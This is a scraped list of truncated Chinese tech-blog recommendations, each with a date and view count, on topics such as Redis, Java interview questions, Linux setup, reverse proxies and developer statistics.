这几天在重温微信小游戏的飞机大战,玩着玩着就在思考人生了,这飞机大战怎么就可以做的那么好,操作简单,简单上手。 帮助蹲厕族、YP族、饭圈女孩在无聊之余可以有一样东西让他们振作起来!让他们的左手 / ... 博文
10-15 阅读数 1万+
提问: 西游记取经团为了节约成本,唐太宗需要在这个团队里裁掉一名队员,该裁掉哪一位呢,为什么? 为了完成西天取经任务,组成取经团队,成员有唐僧、孙悟空、猪八戒、沙和尚、白龙马。 高层领导: 观音... 博文
10-18 阅读数 6761
大数据学习之Linux基础 自定义Linux虚拟机安装网络配置1.node1网络配置2.通过快照克隆虚拟机3.配置其他三个节点虚拟机Linux简单命令shell命令运行原理图1.关机与重启2.判断命令... 博文
10-15 阅读数 1万+
史上最全的java工程师面试题汇总,纯个人总结,精准无误。适合中高级JAVA工程师。... 博文
10-15 阅读数 2292
IEEE Spectrum2019年度编程语言排行榜最近刚刚出炉,Python不出意外的又拿了个第一,但是意料之外的是,曾经大火的PHP,居然跌出了前十!PHP曾被大家称...... 博文
10-16 阅读数 4379
什么是redis? Redis 本质上是一个 Key-Value 类型的内存数据库, 整个数据库加载在内存当中进行操作, 定期通过异步操作把数据库数据 flush 到硬盘上进行保存。 因为是纯内... 博文
10-16 阅读数 5346
昨天在网上发现了一个非常方便的天气API,就用Python试着用了一下。参数是挺少的,用起来也方便,但是那个城市代码确实是搞了我好长时间。 一、介绍 我们先来看一下实现的程序有什么功能: 功能也是非... 博文
10-16 阅读数 4851
前两天因准备美团的面试,导致公众号文章断更了一天,今天就以一篇纯干货来弥补大家。美团的整个面试收获颇丰,与大家分享。 好多年没有面试了,为此专门准备了一天。在美团一个下午经历了四个多小时的三轮技... 博文
10-16 阅读数 4607
项目需求: 实现一个简单的飞机大战程序,当消灭掉一个小飞机的时候的5分,当消灭掉一个小蜜蜂的时候有可能火力值增加24也有可能生命值增加1,如果打飞机也就是英雄机和敌人(蜜蜂+小飞机)碰撞之后... 博文
10-16 阅读数 1万+
前言 工欲善其事 必先利其器 最近受部门的邀请,给入职新人统一培训IDEA,发现有很多新人虽然日常开发使用的是IDEA,但是还是很多好用的技巧没有用到,只是用到一些基本的功能,蛮浪费IDEA这... 博文
10-16 阅读数 5万+
“一个程序员写了个爬虫程序,整个公司200多人被端了。” “不可能吧!” 刚从朋友听到这个消息的时候,我有点不太相信,做为一名程序员来讲,谁还没有写过几段爬虫呢?只因写爬虫程序就被端有点夸张了吧。... 博文
10-20 阅读数 3712
1024程序员的节日就要来了,作者也挤时间写了一篇文章——《我与CSDN的这十年》,分享下程序猿和程序媛的故事,纪念这十年奋斗和感动的日子。十年, 说长不长,说短不短,人生进度条的八分之一,都是青春,... 博文
10-17 阅读数 5465
首先我们先来谈谈String: String对象一旦创建,其值是不能修改的,如果要修改,会重新开辟内存空间来存储修改之后的对象,即修改了String的引用。 因为String的底层是用数组来存值的... 博文
10-17 阅读数 2013
什么是反向代理? 1、有两台服务器A和B属于同一内网段,但是A不通外网,B通外网,客户端C只有外网 2、C想通过B访问A,就需要在服务器B上做反向代理 3、客户端C通过外网与服务器B通信,服务器B通过... 博文
10-17 阅读数 1万+
AWS 终于在 2020年前兑现了自己的承诺:彻底替换 Oracle 数据库。这几乎是每年 Oracle Openworld 大会上 Larry Ellision 固定的一个梗,他说 亚马逊在号召用户... 博文
10-17 阅读数 8714
根据埃文斯数据公司(Evans Data Corporation)2019 最新统计的数据显示,2018 年全球共有 2300 万软件开发人员,预计到 2019 年底这个数字将达到 2640 万。但在... 博文
没有更多推荐了,返回首页